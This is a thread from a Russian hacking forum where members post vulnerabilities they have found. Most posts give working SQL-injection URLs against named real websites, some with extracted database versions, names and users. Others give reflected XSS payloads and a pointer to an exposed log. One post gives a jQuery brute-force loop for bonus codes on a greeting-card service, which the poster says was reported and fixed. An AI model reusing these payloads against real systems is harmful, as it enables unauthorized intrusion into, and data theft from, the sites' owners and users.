Уязвимости SQLi, XSS и другие.

Обсуждение в разделе «Песочница», начал(-а) Егорыч+++, 10.05.2015.

  1. spize0r

    spize0r Member

    Регистрация:
    2.04.2016
    Сообщения:
    40
    Одобрения:
    12
    Репутация:
    4
    Code:
    http://supersleep.ru/?ITEM_ID=2776+/*!12345union*//*!12345select*/version%28%29,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
    
    5.5.43-0+deb7u1
     
  2. spize0r

    spize0r Member

    Регистрация:
    2.04.2016
    Сообщения:
    40
    Одобрения:
    12
    Репутация:
    4
    Code:
    http://www.dutchaero.nl/index.php?catid=13+/*!12345union*//*!12345select*/version%28%29,2,3,4,5,6
    
     
  3. SaNDER

    SaNDER Banned

    Регистрация:
    9.07.2015
    Сообщения:
    213
    Одобрения:
    15
    Репутация:
    3
  4. Егорыч+++

    Администрация

    Регистрация:
    27.05.2002
    Сообщения:
    1 373
    Одобрения:
    895
    Репутация:
    20
  5. spize0r

    spize0r Member

    Регистрация:
    2.04.2016
    Сообщения:
    40
    Одобрения:
    12
    Репутация:
    4
    Code:
    http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,version%28%29,3,4,5,version%28%29,7--+-
    
    5.0.83
    Code:
    http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,database%28%29,3,4,5,version%28%29,7--+-
    
    teamboad
    Code:
    http://teamboad.free.fr/reagir.php?id_news=9+/*!50000union*/+distinct+select+1,user%28%29,3,4,5,version%28%29,7--+-
    
    [email protected]
     
    Это одобряет WallHack.
  6. Егорыч+++

    Администрация

    Регистрация:
    27.05.2002
    Сообщения:
    1 373
    Одобрения:
    895
    Репутация:
    20
    уже заезжанный сайт
     
  7. kingbeef

    kingbeef Reservists Of Antichat

    Регистрация:
    8.04.2010
    Сообщения:
    367
    Одобрения:
    164
    Репутация:
    126
    Может запретить такие ссылки?
    Тема вроде для публикация лично найдены уязвимостей, а [t] подставляет софт.
    Человек закинул ссылки в программу и она кучей их проверяет.
    При публикации даже [t] не убирают.
     
    _________________________
  8. pw0ned

    pw0ned Member

    Регистрация:
    8.01.2016
    Сообщения:
    118
    Одобрения:
    48
    Репутация:
    14
  9. kingbeef

    kingbeef Reservists Of Antichat

    Регистрация:
    8.04.2010
    Сообщения:
    367
    Одобрения:
    164
    Репутация:
    126
  10. pw0ned

    pw0ned Member

    Регистрация:
    8.01.2016
    Сообщения:
    118
    Одобрения:
    48
    Репутация:
    14
    <script>alert()</script>

    фильтрует
     
  11. kingbeef

    kingbeef Reservists Of Antichat

    Регистрация:
    8.04.2010
    Сообщения:
    367
    Одобрения:
    164
    Репутация:
    126
    _________________________
    Это одобряет Octavian.
  12. Octavian

    Octavian Elder - Старейшина

    Регистрация:
    8.07.2015
    Сообщения:
    506
    Одобрения:
    101
    Репутация:
    25
    Это одобряет BabaDook.
  13. BabaDook

    BabaDook Well-Known Member

    Регистрация:
    9.05.2015
    Сообщения:
    1 063
    Одобрения:
    1 559
    Репутация:
    40
    PHP:
    http://vic.md/ro/notebook/list/all/1/producator_ID=9999)+and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database() limit 81,1),0x3a,floor(rand(0)*2))y from information_schema.tables  group by y ) x)+AND+(1)=(1 #   

    AND+(1)=(1 это не нужно. Просто 9999 без )
     
    Это одобряет Octavian.
  14. SaNDER

    SaNDER Banned

    Регистрация:
    9.07.2015
    Сообщения:
    213
    Одобрения:
    15
    Репутация:
    3
    http://takky-shop.ru/images/img/log.txt
    Открытый лог .
    Reflected XSS
    Code:
    http://takky-shop.ru/category/"><script>alert()</script>
    Code:
    http://takky-shop.ru/search
    в поисковике тоже XSS .
     
  15. waydam

    waydam New Member

    Регистрация:
    14.08.2016
    Сообщения:
    1
    Одобрения:
    0
    Репутация:
    0
    10minutemail.com
    XSS

    Еще интересная особенность, письмо дублируется много раз и каждый раз выскакивает алерт, не знаю с чем это связано)
     
    #235 waydam, 22.08.2016
    В последний раз редактировалось: 22.08.2016
  16. BabaDook

    BabaDook Well-Known Member

    Регистрация:
    9.05.2015
    Сообщения:
    1 063
    Одобрения:
    1 559
    Репутация:
    40
  17. SooLFaa

    SooLFaa Members of Antichat

    Регистрация:
    17.03.2014
    Сообщения:
    530
    Одобрения:
    499
    Репутация:
    154
    Солью не столь давний ресерч дабы разбавить скульки да хсски. Как отправлять бесплатно открытки на сервисе voicecards.ru?
    Логическая уязвимость на сервисе voicecard.ru, позволяет отправлять бесплатно голосовые открытки.
    Баг находился в сервисе бонус кодов, то есть бонус код является номером. И при авторизации не через телефон, можно спокойно запустить JQuery скрипт, который с легкостью подберет его за секунды и отправит смс (в дальнейшем его приведу). Теперь детально:
    Первое, авторизовываемся не через телефон, а средствами забытого пароля:
    [​IMG]
    Вызываем форму отправки бонус кода, чтобы вызвать нужную нам форму для подбора.
    [​IMG]
    Далее тупо перебираем скриптом в консоле
    Code:
    for (var i = 800000; i < 800100; i++) { $('.bonus-text').val(i); $('.bonus-send').click(); }
    Что интересно под авторизацией через телефон дает только три попытки, а через средство забытого пароля без ввода телефона - без проблем сколько угодно, связано скорее всего с куками.
    Ну и профитик
    [​IMG]
    Репорт отправлен и на момент написания статьи уже пофикшено. А добрые ребятки отправили мне в благодарность много бесплатных кодов.
     
    _________________________
  18. BabaDook

    BabaDook Well-Known Member

    Регистрация:
    9.05.2015
    Сообщения:
    1 063
    Одобрения:
    1 559
    Репутация:
    40
    #238 BabaDook, 25.10.2016
    В последний раз редактировалось: 26.10.2016
  19. pw0ned

    pw0ned Member

    Регистрация:
    8.01.2016
    Сообщения:
    118
    Одобрения:
    48
    Репутация:
    14
Загрузка...
Similar Threads - Уязвимости SQLi
  1. zase
    Ответы:
    1
    Просмотры:
    3 967
  2. Shadows_God
    Ответы:
    14
    Просмотры:
    9 822